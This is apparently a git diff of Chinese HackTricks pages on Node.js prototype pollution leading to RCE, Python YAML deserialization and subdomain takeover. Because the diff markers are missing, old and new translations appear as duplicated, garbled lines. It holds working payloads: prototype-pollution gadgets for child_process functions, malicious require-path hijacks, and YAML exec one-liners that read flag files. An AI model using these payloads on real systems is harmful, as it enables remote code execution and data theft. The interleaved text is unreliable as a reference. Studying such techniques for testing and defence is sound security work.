例如,如果你执行`__proto__.avar="valuevar"`,进程将以名为`avar`且值为`valuevar`的变量启动
然而,为了使**环境变量成为第一个变量**,你需要**污染**`.env`属性,并且(仅在某些方法中)该变量将成为**第一个变量**(从而允许攻击)。
然而,为了使**环境变量成为第一个**,你需要**污染****`.env`属性**,并且(仅在某些方法中)该变量将是**第一个**允许攻击)。
这就是为什么在以下攻击中**`NODE_OPTIONS`**不在`.env`中的原因。
这就是为什么在以下攻击中**`NODE_OPTIONS`**不在**`.env`**中的原因。
{% endhint %}
{% code overflow="wrap" %}
@ -106,6 +109,8 @@ clone(USERINPUT);
var proc = fork('a_file.js');
// This should create the file /tmp/pp2rec
```
{% endcode %}
### 污染 `constructor.prototype`
```javascript
const { execSync, fork } = require('child_process');
@ -127,12 +132,14 @@ clone(USERINPUT);
var proc = fork('a_file.js');
// This should create the file /tmp/pp2rec2
```
## 通过环境变量 + 命令行实现原型污染到RCE
## PP2RCE via env vars + cmdline
在[**这篇文章**](https://blog.sonarsource.com/blitzjs-prototype-pollution/)中提出了一个类似于之前的一些更改的有效载荷。主要区别在于:
与之前的有效载荷类似,提出了一种有一些变化的有效载荷,详见[**这篇文章**](https://blog.sonarsource.com/blitzjs-prototype-pollution/)**.** 主要区别在于:
- 将Node.js **有效载荷**存储在文件`/proc/self/environ`中,改为存储在**`/proc/self/cmdline`**的argv0中。
- 然后,不再通过**`NODE_OPTIONS`**需要文件`/proc/self/environ`,而是**需要`/proc/self/cmdline`**。
* 它不是将nodejs **有效载荷** 存储在文件 `/proc/self/environ` 中,而是存储在 **`/proc/self/cmdline`** 的 **argv0** 中。
* 然后,它不是通过 **`NODE_OPTIONS`** 要求文件 `/proc/self/environ`,而是 **要求 `/proc/self/cmdline`**
{% code overflow="wrap" %}
```javascript
const { execSync, fork } = require('child_process');
@ -158,7 +165,7 @@ var proc = fork('a_file.js');
## DNS 交互
使用以下有效载荷,可以滥用我们之前讨论过的 NODE_OPTIONS 环境变量,并通过 DNS 交互检测是否起作用
使用以下有效载荷,可以滥用我们之前讨论过的 NODE\_OPTIONS 环境变量,并通过 DNS 交互检测其是否有效
```json
{
"__proto__": {
@ -168,7 +175,7 @@ var proc = fork('a_file.js');
}
}
```
或者,为了避免WAF要求域名:
或者,为了避免 WAF 询问域名:
```json
{
"__proto__": {
@ -178,13 +185,13 @@ var proc = fork('a_file.js');
}
}
```
## PP2RCE漏洞child\_process函数
## PP2RCE 漏洞 child\_process 函数
这一部分中,我们将分析`child_process`中的**每个函数**,以执行代码并查看是否可以使用任何技术来强制该函数执行代码:
本节中,我们将分析 **`child_process` 中的每个函数** 以执行代码,并查看我们是否可以使用任何技术强制该函数执行代码:
<details>
<summary><code>exec</code>利用</summary>
<summary><code>exec</code> 利用</summary>
{% code overflow="wrap" %}
```javascript
@ -211,11 +218,13 @@ p = {}
p.__proto__.shell = "\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"
var proc = exec('something');
```
{% endcode %}
</details>
<details>
<summary><strong><code>execFile</code>利用</strong></summary>
<summary><strong><code>execFile</code> 利用</strong></summary>
```javascript
// environ trick - not working
// It's not possible to pollute the .en attr to create a first env var
@ -234,10 +243,18 @@ var proc = execFile('/usr/bin/node');
// Windows - not working
```
**`execFile`** 要工作,**必须执行 node** 以使 NODE\_OPTIONS 起作用。\
如果**没有**执行 **node**,您需要找出如何通过环境变量**修改执行**任何正在执行的内容并设置它们。
为了使 **`execFile`** 工作,它 **必须执行 node** 以使 NODE\_OPTIONS 生效。\
如果**不** 在执行 **node**,你需要找到如何通过 **环境变量****改变执行** 的内容并设置它们。
**其他**技术**无需**此要求,因为可以通过原型污染**修改执行内容**。(在这种情况下,即使您可以污染 `.shell`,也不会污染正在执行的内容)。
**其他** 技术 **在** 没有这个要求的情况下 **工作**,因为可以通过原型污染 **修改** **被执行的内容**。 (在这种情况下,即使你可以污染 `.shell`,你也不会污染正在被执行的内容)。
</details>
<details>
<summary><code>fork</code> 利用</summary>
{% code overflow="wrap" %}
```javascript
// environ trick - working
// Working after kEmptyObject (fix)
@ -275,11 +292,15 @@ b = {}
b.__proto__.execPath = "\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"
var proc = fork('./a_file.js');
```
{% endcode %}
</details>
<details>
<summary><strong><code>spawn</code>利用</strong></summary>
<summary><strong><code>spawn</code> 利用</strong></summary>
{% code overflow="wrap" %}
```javascript
// environ trick - working with small variation (shell and argv0)
// NOT working after kEmptyObject (fix) without options
@ -316,11 +337,15 @@ p.__proto__.shell = "\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"
var proc = spawn('something');
//var proc = spawn('something',[],{"cwd":"C:\\"}); //To work after kEmptyObject (fix)
```
{% endcode %}
</details>
<details>
<summary><strong><code>execFileSync</code>利用</strong></summary>
<summary><strong><code>execFileSync</code> 利用</strong></summary>
{% code overflow="wrap" %}
```javascript
// environ trick - working with small variation (shell and argv0)
// Working after kEmptyObject (fix)
@ -359,11 +384,15 @@ p.__proto__.shell = "\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"
p.__proto__.argv0 = "\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"
var proc = execSync('something');
```
{% endcode %}
</details>
<details>
<summary><strong><code>execSync</code>利用</strong></summary>
<summary><strong><code>execSync</code> 利用</strong></summary>
{% code overflow="wrap" %}
```javascript
// environ trick - working with small variation (shell and argv0)
// Working after kEmptyObject (fix)
@ -401,11 +430,15 @@ p = {}
p.__proto__.shell = "\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"
var proc = execSync('something');
```
{% endcode %}
</details>
<details>
<summary><strong><code>spawnSync</code>利用</strong></summary>
<summary><strong><code>spawnSync</code> 利用</strong></summary>
{% code overflow="wrap" %}
```javascript
// environ trick - working with small variation (shell and argv0)
// NOT working after kEmptyObject (fix) without options
@ -449,34 +482,37 @@ p.__proto__.shell = "\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"
var proc = spawnSync('something');
//var proc = spawnSync('something',[],{"cwd":"C:\\"}); //To work after kEmptyObject (fix)
```
{% endcode %}
</details>
## 强制执行Spawn
## 强制生成
在之前的示例中,您看到了如何触发一个功能,该功能需要调用`spawn`(用于执行某些操作的`child_process`的所有方法都会调用它)。在之前的示例中,这是代码的一部分,但如果代码没有调用它呢。
在之前的示例中,您看到如何触发小工具,功能需要**调用 `spawn`**的功能**存在**(所有用于执行某些操作的**`child_process`**方法都会调用它)。在之前的示例中,这是**代码的一部分**,但如果代码**没有**调用它呢?
### 控制require文件路径
### 控制 require 文件路径
在这个[其他解释](https://blog.sonarsource.com/blitzjs-prototype-pollution/)中,用户可以控制文件路径,其中将执行`require`。在这种情况下攻击者只需要找到系统中将在导入时执行spawn方法的`.js`文件。\
一些常见文件导入时调用spawn函数的示例包括:
在这个 [**其他写作**](https://blog.sonarsource.com/blitzjs-prototype-pollution/) 中,用户可以控制将执行的 **`require`** 的文件路径。在这种情况下,攻击者只需**找到系统中的一个 `.js` 文件**,该文件在导入时将**执行一个 spawn 方法。**\
一些常见的在导入时调用 spawn 函数的文件示例包括:
* /path/to/npm/scripts/changelog.js
* /opt/yarn-v1.22.19/preinstall.js
* 查找下面的更多文件
* 在下面**找到更多文件**
以下简单脚本将搜索来自`child_process`的调用,而不带任何填充(以避免显示在函数内部的调用):
以下简单脚本将搜索**来自** **child_process**的**调用** **没有任何填充**(以避免显示函数内部的调用):
{% code overflow="wrap" %}
```bash
find / -name "*.js" -type f -exec grep -l "child_process" {} \; 2>/dev/null | while read file_path; do
grep --with-filename -nE "^[a-zA-Z].*(exec\(|execFile\(|fork\(|spawn\(|execFileSync\(|execSync\(|spawnSync\()" "$file_path" | grep -v "require(" | grep -v "function " | grep -v "util.deprecate" | sed -E 's/.{255,}.*//'
done
# Note that this way of finding child_process executions just importing might not find valid scripts as functions called in the root containing child_process calls won't be found.
```
```html
{% endcode %}
<details>
<summary>前脚本发现的有趣文件</summary>
<summary>前脚本发现的有趣文件</summary>
* node\_modules/buffer/bin/**download-node-tests.js**:17:`cp.execSync('rm -rf node/*.js', { cwd: path.join(__dirname, '../test') })`
* node\_modules/buffer/bin/**test.js**:10:`var node = cp.spawn('npm', ['run', 'test-node'], { stdio: 'inherit' })`
@ -490,29 +526,28 @@ done
</details>
### 通过原型污染设置要求文件路径
### 通过原型污染设置 require 文件路径
{% hint style="warning" %}
**先前的技术要求**用户**控制要求的文件路径**。但这并不总是正确的。
**之前的技术要求** **用户控制将要被 require 的文件路径**。但这并不总是正确的。
{% endhint %}
然而,如果代码在原型污染后执行要求,即使**你无法控制要求的路径**,你**可以滥用原型污染来强制执行不同的路径**。因此,即使代码行类似于 `require("./a_file.js")``require("bytes")`,它将**要求你污染的包**。
然而,如果代码在原型污染后执行 require即使你**不控制将要被 require 的路径**,你**可以通过滥用原型污染强制使用不同的路径**。因此,即使代码行是 `require("./a_file.js")``require("bytes")`,它将**require你污染的包**。
因此,如果在原型污染后执行了要求且没有生成函数,这是攻击方式
因此,如果在你的原型污染后执行了一个 require并且没有 spawn 函数,这就是攻击
* 找到系统中的一个**`.js`文件**,当**要求**时将**使用`child_process`执行某些内容**
* 如果你可以上传文件到攻击的平台,你可以上传一个类似的文件
* 污染路径以**强制要求加载`.js`文件**,该文件将使用`child_process`执行某些内容
* **污染环境/cmdline**以在调用`child_process`执行函数时执行任意代码(参见最初的技术)
* 找到一个**系统内的 `.js` 文件**,当被**require**时将**使用 `child_process` 执行某些操作**
* 如果你可以向你攻击的平台上传文件,你可以上传这样的文件
* 污染路径以**强制 require 加载将使用 child_process 执行某些操作的 `.js` 文件**
* **污染环境/命令行**以在调用 child_process 执行函数时执行任意代码(参见初始技术)
#### 绝对要求
#### 绝对 require
如果执行的要求是**绝对的**`require("bytes")`)且**包中不包含`package.json`文件中的主要内容**,你可以**污染`main`属性**并使**要求执行不同的文件**。
如果执行的 require 是**绝对的**`require("bytes")`),并且**包在 `package.json` 文件中不包含 main**,你可以**污染 `main` 属性**并使**require 执行不同的文件**。
{% tabs %}
{% tab title="exploit" %}
{% code overflow="wrap" %}
```
```javascript
// Create a file called malicious.js in /tmp
// Contents of malicious.js in the other tab
@ -547,9 +582,16 @@ const { fork } = require('child_process');
console.log("Hellooo from malicious");
fork("anything");
```
#### 相对路径加载 - 1
{% endtab %}
{% endtabs %}
如果加载的是**相对路径**而不是绝对路径,您可以让节点**加载不同的路径**
#### 相对 require - 1
如果加载的是**相对路径**而不是绝对路径,您可以使节点**加载不同的路径**
{% tabs %}
{% tab title="exploit" %}
{% code overflow="wrap" %}
```javascript
// Create a file called malicious.js in /tmp
// Contents of malicious.js in the other tab
@ -576,16 +618,19 @@ var proc = require('./relative_path.js');
{% endcode %}
{% endtab %}
{% tab title="malicious.js" %}
{% tab title="恶意.js" %}
```javascript
const { fork } = require('child_process');
console.log("Hellooo from malicious");
fork('/path/to/anything');
```
#### 相对路径 require - 2
{% endtab %}
{% endtabs %}
#### 相对 require - 2
{% tabs %}
{% tab title="攻击" %}
{% tab title="利用" %}
{% code overflow="wrap" %}
```javascript
// Create a file called malicious.js in /tmp
@ -615,15 +660,18 @@ var proc = require('./relative_path.js');
{% endcode %}
{% endtab %}
{% tab title="malicious.js" %}
{% tab title="恶意.js" %}
```javascript
const { fork } = require('child_process');
console.log("Hellooo from malicious");
fork('/path/to/anything');
```
#### 相对路径 require - 3
{% endtab %}
{% endtabs %}
类似于前一个示例,这个漏洞在[**这篇文章**](https://blog.huli.tw/2022/12/26/en/ctf-2022-web-js-summary/#balsn-ctf-2022-2linenodejs)中被发现。
#### 相对 require - 3
类似于前一个,这在 [**这篇文章**](https://blog.huli.tw/2022/12/26/en/ctf-2022-web-js-summary/#balsn-ctf-2022-2linenodejs) 中发现。
```javascript
// Requiring /opt/yarn-v1.22.19/preinstall.js
Object.prototype["data"] = {
@ -644,40 +692,41 @@ require('./usage.js')
```
## VM Gadgets
在论文[https://arxiv.org/pdf/2207.11171.pdf](https://arxiv.org/pdf/2207.11171.pdf)中还指出,可以利用**`vm`**库的某些方法中的**`contextExtensions`**的控制作为一个gadget。\
然而,就像之前的**`child_process`**方法一样,在最新版本中已经被**修复**
在论文 [https://arxiv.org/pdf/2207.11171.pdf](https://arxiv.org/pdf/2207.11171.pdf) 中也指出,**`vm`** 库某些方法的 **`contextExtensions`** 控制可以作为一个 gadget。\
然而,与之前的 **`child_process`** 方法一样,它在最新版本中已被 **修复**
## Fixes & Unexpected protections
## 修复与意外保护
请注意,如果正在访问的对象的**属性**是**undefined**,则原型污染会起作用。如果在**代码**中为该**属性**设置了一个**值**,则**无法覆盖**它
请注意,原型污染在访问的对象的 **属性****undefined** 时有效。如果在 **代码** 中该 **属性****设置** 为一个 **值**,你 **将无法覆盖它**
2022年6月从[**此提交**](https://github.com/nodejs/node/commit/20b0df1d1eba957ea30ba618528debbe02a97c6a)中,变量`options`不再是`{}`,而是**`kEmptyObject`**。这样可以**防止原型污染**影响**`options`**的**属性**以获取RCE。\
至少从v18.4.0开始,这种保护已经**实施**,因此影响这些方法的`spawn`和`spawnSync`**利用**(如果未使用`options`**不再起作用**
2022 年 6 月,从 [**这个提交**](https://github.com/nodejs/node/commit/20b0df1d1eba957ea30ba618528debbe02a97c6a) 开始,变量 `options` 不再是 `{}`,而是 **`kEmptyObject`**。这 **防止了原型污染** 影响 **`options`** 的 **属性** 以获取 RCE。\
至少从 v18.4.0 开始,这种保护已被 **实施**,因此 `spawn``spawnSync` **漏洞** 影响的方法 **不再有效**(如果不使用 `options`!)。
[**此提交**](https://github.com/nodejs/node/commit/0313102aaabb49f78156cadc1b3492eac3941dd9)中,还**在某种程度上修复了**vm库中**`contextExtensions`**的**原型污染**,将选项设置为**`kEmptyObject`**而不是**`{}`**。
[**这个提交**](https://github.com/nodejs/node/commit/0313102aaabb49f78156cadc1b3492eac3941dd9) 中vm 库的 **`contextExtensions`** 的 **原型污染****在某种程度上被修复**,将选项设置为 **`kEmptyObject`** 而不是 **`{}`**。
### **其他 Gadgets**
* [https://github.com/yuske/server-side-prototype-pollution](https://github.com/yuske/server-side-prototype-pollution)
* [https://github.com/KTH-LangSec/server-side-prototype-pollution](https://github.com/KTH-LangSec/server-side-prototype-pollution)
## References
## 参考文献
* [https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/](https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/)
* [https://blog.sonarsource.com/blitzjs-prototype-pollution/](https://blog.sonarsource.com/blitzjs-prototype-pollution/)
* [https://arxiv.org/pdf/2207.11171.pdf](https://arxiv.org/pdf/2207.11171.pdf)
* [https://portswigger.net/research/server-side-prototype-pollution](https://portswigger.net/research/server-side-prototype-pollution)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>Support HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF版本的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS Family**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)系列
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

View file

@ -1,22 +1,23 @@
# Python Yaml 反序列化
# Python Yaml Deserialization
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
## Yaml **反序列化**
**Yaml** Python 库还能够**序列化 Python 对象**而不仅仅是原始数据:
**Yaml** python 库也能够 **序列化 python 对象** 而不仅仅是原始数据:
```
print(yaml.dump(str("lol")))
lol
@ -34,11 +35,11 @@ print(yaml.dump(range(1,10)))
- 10
- 1
```
检查一下**元组**不是原始数据类型,因此它被**序列化**。同样的情况也发生在**range**(取自内置函数)上
检查一下 **tuple** 不是原始数据类型,因此它被 **序列化** 了。 **range** 也是如此(取自内置函数)
![](<../../.gitbook/assets/image (1040).png>)
**safe_load()**或**safe_load_all()**使用SafeLoader**不支持类对象反序列化**。类对象反序列化示例:
**safe\_load()** **safe\_load\_all()** 使用 SafeLoader并且 **不支持类对象反序列化** 类对象反序列化示例:
```python
import yaml
from yaml import UnsafeLoader, FullLoader, Loader
@ -57,11 +58,11 @@ print(yaml.unsafe_load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>
#The other ways to load data will through an error as they won't even attempt to
#deserialize the python object
```
先前的代码使用**unsafe\_load**来加载序列化的Python类。这是因为在**版本 >= 5.1**中,它不允许**反序列化任何序列化的Python类或类属性**如果在load()中未指定Loader或Loader=SafeLoader。
之前的代码使用了 **unsafe\_load** 来加载序列化的 python 类。这是因为在 **version >= 5.1** 中,它不允许 **反序列化任何序列化的 python 类或类属性**,如果在 load() 中未指定 Loader 或 Loader=SafeLoader。
### 基本利用
执行**sleep**的示例:
如何 **执行一个 sleep** 的示例:
```python
import yaml
from yaml import UnsafeLoader, FullLoader, Loader
@ -76,11 +77,11 @@ print(yaml.unsafe_load(data)) #Executed
print(yaml.full_load_all(data))
print(yaml.unsafe_load_all(data))
```
### 使用没有Loader的可利用.load("\<content>")
### 漏洞 .load("\<content>") 没有 Loader
旧版本的pyyaml在加载内容时如果**没有指定Loader**,存在反序列化攻击的漏洞`yaml.load(data)`
**旧版本**的 pyyaml 在加载内容时如果**不指定 Loader**,则容易受到反序列化攻击`yaml.load(data)`
你可以在[**这里找到漏洞的描述**](https://hackmd.io/@defund/HJZajCVlP)**。** 该页面提出的**利用**是:
您可以在[**此处找到漏洞的描述**](https://hackmd.io/@defund/HJZajCVlP)**.** 页面中提出的**利用**是:
```yaml
!!python/object/new:str
state: !!python/tuple
@ -89,15 +90,15 @@ state: !!python/tuple
state:
update: !!python/name:exec
```
或者您也可以使用@ishaack提供的这个**一行代码**
或者你也可以使用这个**@ishaack 提供的单行代码**
```yaml
!!python/object/new:str {state: !!python/tuple ['print(exec("print(o"+"pen(\"flag.txt\",\"r\").read())"))', !!python/object/new:Warning {state : {update : !!python/name:exec } }]}
```
请注意,在**最近的版本**中,您不能再调用`.load()`**而不使用`Loader`**,而**`FullLoader`**不再容易受到这种攻击
注意,在**最近的版本**中,您不能**再调用 `.load()`** **而不使用 `Loader`**,并且**`FullLoader`** **不再易受此攻击**
## RCE
可以使用Python YAML模块如**PyYAML**或**ruamel.yaml**)创建自定义有效载荷。这些有效载荷可以利用系统中对未经适当消毒的输入进行反序列化的漏洞。
可以使用 Python YAML 模块,如 **PyYAML****ruamel.yaml** 创建自定义有效负载。这些有效负载可以利用在没有适当清理的情况下反序列化不受信任输入的系统中的漏洞。
```python
import yaml
from yaml import UnsafeLoader, FullLoader, Loader
@ -117,9 +118,9 @@ print(yaml.load(deserialized_data, Loader=UnsafeLoader))
print(yaml.load(deserialized_data, Loader=Loader))
print(yaml.unsafe_load(deserialized_data))
```
### 用于生成Payloads的工具
### 创建有效负载的工具
可以使用工具[https://github.com/j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator)来生成Python反序列化Payloads以滥用**Pickle、PyYAML、jsonpickle和ruamel.yaml**
该工具 [https://github.com/j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator) 可用于生成 python 反序列化有效负载,以滥用 **Pickle, PyYAML, jsonpickle 和 ruamel.yaml:**
```bash
python3 peas.py
Enter RCE command :cat /root/flag.txt
@ -141,21 +142,22 @@ cat /tmp/example_yaml
- cat
- /root/flag.txt
```
### 参考资料
### 参考文献
* [https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf](https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf)
* [https://net-square.com/yaml-deserialization-attack-in-python.html](https://net-square.com/yaml-deserialization-attack-in-python.html)
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,124 +1,126 @@
# 域名/子域接管
# 域名/子域名接管
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用[**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=domain-subdomain-takeover)可以轻松构建和**自动化工作流程**,使用世界上**最先进**的社区工具。\
立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=domain-subdomain-takeover) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
今天就获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=domain-subdomain-takeover" %}
## 域接管
## 域接管
如果您发现某个域名domain.tld**被某个服务在范围内使用**,但**公司**已经**失去了对其的所有权**,您可以尝试**注册**它(如果便宜的话),并通知该公司。如果该域名通过**GET**参数或**Referer**头部接收到一些**敏感信息**比如会话cookie那么这肯定是一个**漏洞**
如果你发现某个域名 (domain.tld) **被某个服务使用在范围内**,但 **公司** 已经失去了对它的 **所有权**,你可以尝试 **注册** 它(如果价格足够便宜)并通知公司。如果这个域名接收一些 **敏感信息**,比如通过 **GET** 参数或在 **Referer** 头中的会话 cookie这肯定是一个 **漏洞**
### 子域接管
### 子域接管
公司的一个子域指向一个**未注册名称的第三方服务**。如果您可以在这个**第三方服务**中**创建**一个**帐户**并**注册**正在使用的**名称**,则可以执行子域接管。
公司的一个子域名指向一个 **未注册名称的第三方服务**。如果你可以在这个 **第三方服务****创建** 一个 **账户****注册** 正在使用的 **名称**,你就可以执行子域名接管。
有几种带有字典的工具可用于检查可能的接管:
有几个工具带有字典来检查可能的接管:
- [https://github.com/EdOverflow/can-i-take-over-xyz](https://github.com/EdOverflow/can-i-take-over-xyz)
- [https://github.com/blacklanternsecurity/bbot](https://github.com/blacklanternsecurity/bbot)
- [https://github.com/punk-security/dnsReaper](https://github.com/punk-security/dnsReaper)
- [https://github.com/haccer/subjack](https://github.com/haccer/subjack)
- [https://github.com/anshumanbh/tko-sub](https://github.com/anshumanbh/tko-subs)
- [https://github.com/ArifulProtik/sub-domain-takeover](https://github.com/ArifulProtik/sub-domain-takeover)
- [https://github.com/SaadAhmedx/Subdomain-Takeover](https://github.com/SaadAhmedx/Subdomain-Takeover)
- [https://github.com/Ice3man543/SubOver](https://github.com/Ice3man543/SubOver)
